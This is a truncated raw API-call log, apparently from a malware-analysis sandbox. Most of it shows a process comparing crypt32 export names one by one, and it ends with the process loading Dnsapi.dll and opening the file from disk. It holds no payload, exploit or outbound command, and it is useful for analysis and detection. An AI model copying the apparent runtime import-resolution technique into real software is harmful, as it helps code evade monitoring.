[0289.465] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.465] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.465] lstrcmpA (lpString1="CertAddCTLContextToStore", lpString2="CertAddCTLContextToStore") returned 0 [0289.465] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddCTLLinkToStore", lpString2="CertAddCTLLinkToStore") returned 0 [0289.466] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLContextToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLContextToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateContextToStore", lpString2="CertAddCertificateContextToStore") returned 0 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLContextToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCRLLinkToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLContextToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCTLLinkToStore") returned -1 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddCertificateLinkToStore", lpString2="CertAddCertificateLinkToStore") returned 0 [0289.466] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0289.466] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCRLToStore", lpString2="CertAddEncodedCRLToStore") returned 0 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCTLToStore", lpString2="CertAddEncodedCTLToStore") returned 0 [0289.557] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0289.557] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCRLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCTLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToStore", lpString2="CertAddEncodedCertificateToStore") returned 0 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCRLLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCTLLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCRLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCTLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreA", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 0 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCRLLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCTLLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateContextToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCRLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCTLToStore") returned -1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.558] lstrcmpA (lpString1="CertAddEncodedCertificateToSystemStoreW", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 0 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCRLLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCTLLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.559] lstrcmpA (lpString1="CertAddEnhancedKeyUsageIdentifier", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 0 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.559] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 0 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLContextToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCRLLinkToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLContextToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCTLLinkToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateContextToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.560] lstrcmpA (lpString1="CertAddRefServerOcspResponseContext", lpString2="CertAddRefServerOcspResponseContext") returned 0 [0289.560] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.560] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCTLLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.561] lstrcmpA (lpString1="CertAddSerializedElementToStore", lpString2="CertAddSerializedElementToStore") returned 0 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLContextToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCRLLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLContextToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCTLLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateContextToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.561] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddSerializedElementToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAddStoreToCollection", lpString2="CertAddStoreToCollection") returned 0 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLContextToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCRLLinkToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLContextToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCTLLinkToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateContextToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.562] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddSerializedElementToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAddStoreToCollection") returned 1 [0289.563] lstrcmpA (lpString1="CertAlgIdToOID", lpString2="CertAlgIdToOID") returned 0 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLContextToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCRLLinkToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLContextToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCTLLinkToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateContextToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.563] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddSerializedElementToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAddStoreToCollection") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertAlgIdToOID") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseServerOcspResponse", lpString2="CertCloseServerOcspResponse") returned 0 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLContextToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCRLLinkToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLContextToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCTLLinkToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateContextToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddSerializedElementToStore") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAddStoreToCollection") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertAlgIdToOID") returned 1 [0289.564] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseServerOcspResponse") returned 1 [0289.565] lstrcmpA (lpString1="CertCloseStore", lpString2="CertCloseStore") returned 0 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLContextToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCRLLinkToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLContextToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCTLLinkToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateContextToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddSerializedElementToStore") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAddStoreToCollection") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertAlgIdToOID") returned 1 [0289.565] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseServerOcspResponse") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCloseStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificate", lpString2="CertCompareCertificate") returned 0 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLContextToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCRLLinkToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLContextToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCTLLinkToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateContextToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.566] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddSerializedElementToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAddStoreToCollection") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertAlgIdToOID") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseServerOcspResponse") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCloseStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificate") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareCertificateName", lpString2="CertCompareCertificateName") returned 0 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLContextToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCRLLinkToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLContextToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCTLLinkToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateContextToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddCertificateLinkToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCRLToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCTLToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreA") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEncodedCertificateToSystemStoreW") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddEnhancedKeyUsageIdentifier") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponse") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddRefServerOcspResponseContext") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddSerializedElementToStore") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAddStoreToCollection") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertAlgIdToOID") returned 1 [0289.567] lstrcmpA (lpString1="CertCompareIntegerBlob", lpString2="CertCloseServerOcspResponse") returned 1 [0289.584] GetProcessHeap () returned 0x540000 [0289.584] HeapFree (in: hHeap=0x540000, dwFlags=0x0, lpMem=0x4108040 | out: hHeap=0x540000) returned 1 [0289.703] GetProcessHeap () returned 0x540000 [0289.704] RtlAllocateHeap (HeapHandle=0x540000, Flags=0x0, Size=0x10) returned 0x559200 [0289.704] LoadLibraryA (lpLibFileName="Dnsapi.dll") returned 0x7ffc5a8a0000 [0289.729] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0289.730] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0289.730] GetModuleFileNameA (in: hModule=0x7ffc5a8a0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")) returned 0x1e [0289.730] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\Dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0289.730] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0289.730] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 